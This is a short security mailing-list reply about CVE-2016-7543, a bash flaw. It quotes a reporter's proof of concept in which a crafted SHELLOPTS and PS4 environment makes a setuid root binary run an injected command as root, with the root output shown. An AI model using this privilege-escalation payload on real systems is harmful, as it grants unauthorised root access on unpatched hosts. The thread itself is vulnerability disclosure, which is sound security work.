Re: CVE-2016-7543 -- bash SHELLOPTS+PS4

[Tavis Ormandy <taviso () cmpxchg8b com>]

up201407890 () alunos dcc fc up pt wrote:

> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
>
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
>
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
>
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' #
> chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06
> ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat
> Sep 10 18:06:36 WET 2016
>
> Sorry Tavis :P

Hah, nice work :-)

Tavis.